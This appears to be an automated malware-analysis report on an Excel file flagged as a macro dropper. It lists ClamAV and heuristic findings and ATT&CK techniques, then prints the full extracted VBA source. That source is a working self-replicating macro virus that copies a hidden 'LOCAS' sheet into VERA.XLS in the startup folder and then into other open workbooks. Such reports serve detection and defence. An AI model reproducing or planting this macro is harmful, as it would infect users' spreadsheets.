MALICIOUS
128
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The critical ClamAV detection and high heuristic for CreateObject indicate malicious intent. The VBA macro contains an Auto_Open subroutine that attempts to copy the current workbook and save it as 'VERA.XLS' in the application's startup path. This action strongly suggests an attempt to establish persistence or facilitate the execution of a second-stage payload.
Heuristics 4
-
ClamAV: Xls.Dropper.Agent-7372981-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Dropper.Agent-7372981-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set X = CreateObject("ADODB.Connection") -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub auto_open()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2702 bytes |
SHA-256: fa7d62f5233ed5bb84f05d418614b33600400dbed2227f277c7d15068e560be4 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Locas"
Sub fig()
Attribute fig.VB_ProcData.VB_Invoke_Func = " \n14"
Set X = CreateObject("ADODB.Connection")
X.Open "Provider=Microsoft.Jet.OLEDB.4.0;Extended Properties=Excel 8.0;Data Source=" & ThisWorkbook.FullName
Sql = "select mid(款号,1,2) & '0000 组', sum(件数) from [货品销售$] group by mid(款号,1,2)"
Set yy = X.Execute(Sql)
[g10:h44].Clear
[g10].CopyFromRecordset yy
Set yy = Nothing: Set X = Nothing
End Sub
Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
Attribute check_files.VB_ProcData.VB_Invoke_Func = " \n14"
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "VERA.XLS")
If m$ = "VERA.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
Select Case whichfile
Case 10
Application.ScreenUpdating = False
n4$ = ActiveWorkbook.Name
Sheets("locas").Visible = True
Sheets("locas").Select
Sheets("locas").Copy
With ActiveWorkbook
.Title = ""
.Subject = ""
.Author = ""
.Keywords = ""
.Comments = ""
End With
newname$ = ActiveWorkbook.Name
c4$ = CurDir()
ChDir Application.StartupPath
ActiveWindow.Visible = False
Workbooks(newname$).SaveAs FileName:=Application.StartupPath & "/" & "VERA.XLS", FileFormat:=xlNormal _
, Password:="", WriteResPassword:="", ReadOnlyRecommended:= _
False, CreateBackup:=False
ChDir c4$
Workbooks(n4$).Sheets("LOCAS").Visible = False
Application.OnSheetActivate = ""
Application.ScreenUpdating = True
Application.OnSheetActivate = "VERA.xls!check_files"
Case 1
Application.ScreenUpdating = False
n4$ = ActiveWorkbook.Name
p4$ = ActiveWorkbook.Path
S$ = Workbooks(n4$).Sheets(1).Name
If S$ <> "LOCAS" Then
Workbooks("VERA.XLS").Sheets("LOCAS").Copy before:=Workbooks(n4$).Sheets(1)
Workbooks(n4$).Sheets("LOCAS").Visible = False
Else
End If
Application.OnSheetActivate = ""
Application.ScreenUpdating = True
Application.OnSheetActivate = "VERA.xls!check_files"
Case Else
End Select
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.